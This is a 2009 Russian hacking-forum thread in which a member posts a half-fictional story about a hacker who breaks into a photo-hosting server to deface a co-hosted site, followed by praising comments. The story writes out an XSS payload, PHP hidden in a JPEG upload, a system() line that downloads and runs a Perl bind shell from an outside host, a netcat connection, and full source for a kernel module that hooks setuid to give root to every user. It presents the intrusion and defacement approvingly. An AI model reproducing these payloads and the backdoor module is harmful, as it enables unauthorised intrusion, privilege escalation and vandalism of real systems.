ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Story. Полночный взлом.
  #1  
Старый 20.08.2009, 20:35
Аватар для --StraNger--
--StraNger--
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме:
404716

Репутация: 145
Отправить сообщение для --StraNger-- с помощью ICQ
По умолчанию Story. Полночный взлом.

Story. Полночный взлом.


I N T R O или вступление.
Салют, читатель! Вот сидел сейчас и думал: какую же все-таки статью лучше написать и пришла мне в голову идея написать "статью-рассказ". То есть наполовину художественный наполовину технический. В общем смотрите что получилось.


B O D Y.
Горящие часы на скринсейвере показывали 12:10.
Макс скучал.
В сети почти не кого не было. Лениво просматривая новостную ленту секлаба он уже собирался выключать компьютер, но тут в онлайн вышел его хороший знакомый – kerny.

С ним он познакомился довольно давно. Когда то они состояли в одной тиме, которая впоследствии распалась.

Решив немного поболтать, Макс написал ему. Поговорив на отвлеченные темы, kerny кинул Максиму ссылку на один сайт - englishrussia.com, отправив при этом несколько ругательств в сторону его создателей.
Пробежавшись по контенту, стало понятно, что смысловая нагрузка ресурса направлена на антироссийскую политику.
Автор активно «обсирал» все, что касается России.
Не сказать, что Макс был патриотом, но было обидно наблюдать, как его родину обливают грязью.
Мысль тут же мелькнула в его голове:

«а почему бы не…»

Написав об этом kerny, Максим узнал что тот тоже об этом думал. Но на сайте стоял WordPress 2.7.1, а толковых сплоитов под него не было. Делать было нечего, а спать не хотелось, поэтому Макс решил копнуть глубже и посмотреть этот ресурс под более сильным зумом.
...
Несмотря на отрытое окно в комнате было жарко. Сходив за газировкой Максим начал изучение сайта. Воспользовавшись инструментов madnet –a «Google madnet Scaner», он просканировал ресурс. Скрипт определил, что на сервере находится еще один сайт - pixdaus.com.
Он представлял из себя что-то вроде хостинга для фотографий.

«Угу, тут то можно найти дыру, для начала стоит поискать админку»

Сразу проверив адреса ...


Код:
www.pixdaus.com/admin
www.pixdaus.com/admin.php
...Макса ждало разочарование — «Ошибка 404», страниц не существовало.
Тогда он попробовал найти админ-панель через Google:



Код:
site: pixdaus.com admin.
К сожалению и это не помогло.
Но беглый осмотр движка дал свои плоды.
После обращения к адресу:


Код:
index.php?fun=66'&from=favourites
Сайт выдавал кучу непонятной информации. Макс обрадовался, предвкушая «легкую скулю» но как выяснилось он ошибся. К sql инъекциям это отношение не имело. Сервер похоже выплевывал http заголовки входящего и еще кое-что непонятное.Вот кусок того, что увидел Максим:


Код:
HTTP_USER_AGENT=Mozilla/5.0 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072807 ASPLinux/3.0.1-1.0.140asp FirefHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8


«Возможно здесь есть место xss»

Открыв плагин «LiveHTTPHeaders», Макс изменил заголовок. Он ввел в поле HTTP_USER_AGENTнебольшой скрипт:

Код:
HTTP_USER_AGENT: <script>alert(/fuke in/)</script>
В ответ на это он увидел сообщение с текстом «/fukein/»

«Такс... уже кое-что, но с такой xss мало что реализуешь»

Поизучав еще немного те данные, которые выплюнул сервер, взломщик обнаружил интересную фичу:

Код:
.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=site:pixdaus.com admin
«Это ведь тот запрос, который я отдавал в гугл! Может удастся получить активку?»

Улыбнувшись, Макс вбил в Google такой запрос



site: pixdaus.com document <script>alert(/fuke in/)</script>

Но результат был нулевым.
Поисковик не мог найти на сайте все содержимое запроса.

«Значит нужно кое-что урезать»

Немного помозговав, Максим сделал так:


Код:
site:pixdaus.com document -"script>alert(/fuke in/)</script>"
Зайдя по одной из ссылок, он вернулся к странице с уязвимостью.
Обновив, ее он увидел знакомое сообщение.

«Ну что ж, активная xss уже неплохо, но оставим это на крайний случай».

Погуляв по страницам сайта, Макс нашел форму для регистрации.
Создав новый аккаунт, взломщик заметил, что есть возможность заливать фотографии на сервер.

«Хм… а что если возможно выполнить php код?»


Записав в файл небольшой скрипт, Максим переименовал его так:


Код:
photo.php.jpg
Но смена расширение не дала результатов.
Макс хотел уже оставить идею с картинкой, но решил попробовать еще один способ.
Открыв картинку в программе WinHex и перейдя в конец файла, он нашел значения «FF D9» и затер их нулями. После этого он вставил свой php код в конец файла в формате ascii. А значения FF D9 добавил после кода.


«Ну что ж попробуем»

Загрузив фотографию, Макс был приятно удивлен. Код в jpg картинке работал.
...
Откинувшись на спинку кресла, Максим закрыл глаза ладонями.
Он всегда так делал после наряженной работы.

«Пора что-нибудь поесть и отдохнуть заодно»

Резко встав с кресла, Макс отправился на кухню.
Кот сидевший рядом тут же рванул за ним, надеясь что хозяин поделится с ним.

Пока кипел чайник, Максим сделал себе бутерброд с сыром, дав кусочек коту.

Последнее время жизнь складывалась не лучшим образом. Все друзья и знакомые отворачивались от него. Хотя нет… У него были друзья, но только в сети.
Только их он считал настоящими друзьями.
Один институтский товарищ как-то сказал ему:

«Со своими компьютерами ты когда-нибудь до суицида доиграешься»

Максим не принимал эти слова всерьез… или просто не хотел принимать.
С каждым днем он все глубже и глубже погружался в виртуальный мир.
Забывая при этом реальный. Последние 4 месяца Макс редко выходил из квартиры…. Если выходил, то только купить пачку чая и какой-нибудь полуфабрикат.



«Ладно, хватит. Завтра схожу в парк, прогуляюсь» - подумал он, прогоняя тревожные мысли.


В этот момент чайник пикнул, информируя о том, что вода вскипела.
Максим распечатал пачку зеленого чая и насыпал заварку в кружку.
Он страдал гипертонией, и врачи рекомендовали пить зеленый чай для нормализации давления.
Прихватив бутерброд, Макс отправился в свою комнату. На экране уже появился скринсейвер с горящими часами. Они показывали 12:59.
За окном слышались гогот пьяной молодежи.

«Бля, им обязательно бухать около моего дома?»

Дожевывая бутерброд, Максим нажал пару раз на Enter, избавляясь от заставки.
...
Включив своего любимого «Карандаша» он подумал:

«Итак, у нас есть возможность выполнять php код, теперь стоит залить биндшелл на сервер, для более удобной работы»

Открыв картинку еще раз Макс дописал такой код:



Код:
<? system (‘cd /tmp; wget http://stanger.hr/bind.pl;chmod 755 bind.pl; perl bind.pl ‘);?>


Это должно было загрузить и запустить bindshell на Perl.
Запустив консоль, Максим набрал:




Код:
nc 66.90.103.79 21656
И скрестив пальцы, стал ждать. Была опасность, что файрвол будет резать подключения и придется делать бэкконнект. Но к счастью подключение произошло удачно. У Макса был shell доступ.

Первым делом команда who...



Код:
[STR]$ who
  FraCrEx :0          2009-07-02 1.05
...показала что мы одни в системе.


«Отлично, теперь можно не торопиться, интересно какие у нас права»



Код:
[STR]$ id
  uid=10(FraCrEx) gid=10(FraCrEx) группы=10FraCrEx) context=unconfined_u:system_r:hotplug_t:s0-s0:c0.c1023
На счастье uname показала, что на сервере крутилась Linux 2.6.30.

Под него был недавно написан сплоит который можно найти здесь
Залив исходник на сервер Макс попытался его скомпилировать.



Код:
[STR]$gcc –sploit sploit.c
[CODE]

Но компилятор упорно не хотел собирать программу.
Под него был недавно написан сплоит который можно найти

Открыв код, взломщик нашел то, что мешало компиляции.
Во-первых, в условии была синтаксическая ошибка:



Код:
If(result=NULL)
  {action}
Во вторых, главная функция не принимало аргументов, хотя в ходе эксплоита они использовались.

К тому же в начале кода присутствовала такая строка:



System("rm –fr *")

«Очевидно, разработчик хотел отпугнуть скрипт-кидди»

После исправления ошибок, эксплоит успешно скомпилировался и Макс получил Root.
Увлекшись взломом, он забыл о главной цели – сайт с антироссийским содержанием.

«Теперь можно устроить маленькую месть»

Найдя на сервере нужные файлы, взломщик повесил простенький дефейс

Можно было потереть всю базу сайта, но Максим отказался от этой идеи.

«Хм... админа так и нет. Как бы еще напакостить…?»

Тут Максу пришла одна идея.



«Что если подшутить над админом?
Пусть root пользователь сможет войти только с правами nobody, а все остальные наоборот – root»


Для этого нужно было подключить к ядру модуль с нужным кодом.

Порывшись у себя в файлах, Макс нашел исходник, который реализует весь прикол:


Код:
  #define __KERNEL__
  #define MODULE
   
  #include <linux/config.h>
  #include <linux/module.h>
  #include <linux/version.h>
  #include <sys/syscall.h>
  #include <linux/sched.h>
  #include <linux/types.h>
  extern void *sys_call_table[]; 
  int (*orig_setuid)(uid_t);
  int change_setuid(uid_t uid)
  {
    switch (uid)
    {
      case 0:
        current->uid = 99;  /
        current->euid = 99; 
        current->gid = 99;  
        current->egid = 99; 
        break;
      default:
        current->uid = 0;   
        current->euid = 0;  
        current->gid = 0;  
        current->egid = 0;
        break;
    }
    return 0;  
  }
  int init_module(void)
  {
     orig_setuid = sys_call_table[__NR_setuid32];
     sys_call_table[__NR_setuid32] = change_setuid;
     return 0;  
  }
  void cleanup_module(void)
  {
     sys_call_table[__NR_setuid32] = orig_setuid; 
  }
Скомпилировал его:


Код:
[STR]$ gcc -o code.o -c code.c
Далее скопировал в каталог /lib/midules
Код:

cp code.o /lib/modules

И загрузил в ядро


Код:
insmod code.o


«Пусть админ побесится»

Закрыв окно терминала, Максим устало взглянул на часы.

Было 2:23.
Отправив kerny в оффлайн сообщение об удачном дефейсе, он выключил компьютер.
Можно было идти спать.
Спихнув с софы кота, Макс упал на подушку и заснул.

O U T R O или послесловие.
В этом рассказе я позволил себе маленький эксперимент. Я взял что-то из реальности, что то сам выдумал и на основе этого составил весь текст. В любом случае, приведенные в рассказе уязвимости встречались мне реально.
Кстати, дело в том, что у меня нет даже среднего образования, так что прошу прощения за мою некрасивую речь.
Ну, вот и все. Жду комментариев и жесткой критики.
Ps Кота звали «Степа»

©StraNgeR from GR-TEAM

Последний раз редактировалось --StraNger--; 22.08.2009 в 17:25..
 
Ответить с цитированием

  #2  
Старый 20.08.2009, 20:53
Аватар для .Varius
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию

Статья понравилась, было интересно прочитать с начала и до конца, хоть и детективы редко читаю

А почему "Чужие статьи"?

Цитата:
©StraNgeR from GR-TEAM
 
Ответить с цитированием

  #3  
Старый 20.08.2009, 21:26
Аватар для =Zeus=
=Zeus=
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме:
724939

Репутация: 108
Отправить сообщение для =Zeus= с помощью ICQ
По умолчанию

Статья очень понравилась, но где на сайте http://www.pixdaus.com/ антироссийское содержание? Или ты просто для примера его взял?

А там где скрипт в картитку дописывать, у меня почему-то не выдает сообщение даже на моем компе, пробовал на всех браузерах, хотя открывается, все норм.

Последний раз редактировалось =Zeus=; 20.08.2009 в 22:49..
 
Ответить с цитированием

  #4  
Старый 20.08.2009, 23:56
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от [Raz0r]  
Макс еще и наркоман?
Цитата:
«Хм… а что если возможно выполнить php код?»

Записав в файл небольшой скрипт, Максим переименовал его так:

photo.php.jpg

Но смена расширение не дала результатов.
Макс хотел уже оставить идею с картинкой, но решил попробовать еще один способ.
Открыв картинку в программе WinHex и перейдя в конец файла, он нашел значения «FF D9» и затер их нулями. После этого он вставил свой php код в конец файла в формате ascii. А значения FF D9 добавил после кода.

«Ну что ж попробуем»

Загрузив фотографию, Макс был приятно удивлен. Код в jpg картинке работал.
Да и админ сервера тоже не против хорошенько обдолбаться
 
Ответить с цитированием

  #5  
Старый 21.08.2009, 00:47
Аватар для flacs
flacs
Познающий
Регистрация: 28.01.2009
Сообщений: 90
Провел на форуме:
432613

Репутация: 80
По умолчанию

есть "нить", постепенно ведущая к желаемой цели, интересно читать, захватывает...
 
Ответить с цитированием

  #6  
Старый 21.08.2009, 16:41
Аватар для Flair
Flair
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226

Репутация: 38
По умолчанию

Цитата:
Последнее время жизнь складывалась не лучшим образом. Все друзья и знакомые отворачивались от него. Хотя нет… У него были друзья, но только в сети.
Цитата:
С каждым днем он все глубже и глубже погружался в виртуальный мир.
жоско

Цитата:
«Бля, им обязательно бухать около моего дома?»
Над было фсе барасать и бежать к ним
 
Ответить с цитированием

  #7  
Старый 21.08.2009, 17:26
Аватар для Drag_on
Drag_on
Участник форума
Регистрация: 06.11.2008
Сообщений: 116
Провел на форуме:
134680

Репутация: 38
По умолчанию

кажется это уже где-то было....могу ошибаться может тс правил статью
 
Ответить с цитированием

  #8  
Старый 21.08.2009, 17:28
Аватар для m0nsieur
m0nsieur
Участник форума
Регистрация: 08.04.2008
Сообщений: 242
Провел на форуме:
2230263

Репутация: 229
По умолчанию

Как-то утопично, в плане того что он сидит дома, у него нет друзей кроме виртуальных, как кто-то заметил похоже на - ][... Хотя возможно прием такой, чтобы создать ощущение одинокого хакера, романтика...
 
Ответить с цитированием

  #9  
Старый 22.08.2009, 00:59
Аватар для Suicide
Suicide
Moderator - Level 7
Регистрация: 24.04.2009
Сообщений: 1,730
Провел на форуме:
30140275

Репутация: 3256


По умолчанию

Ух ты, хорошая (а главное необычная) манера изложения, было интересно почитать.
 
Ответить с цитированием

  #10  
Старый 22.08.2009, 02:33
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от Drag_on  
кажется это уже где-то было....могу ошибаться может тс правил статью
в ксакепе почти все статьи про взлом такие
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Prizrak- 17 лет. Смешно. baltika Болталка 35 23.08.2009 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ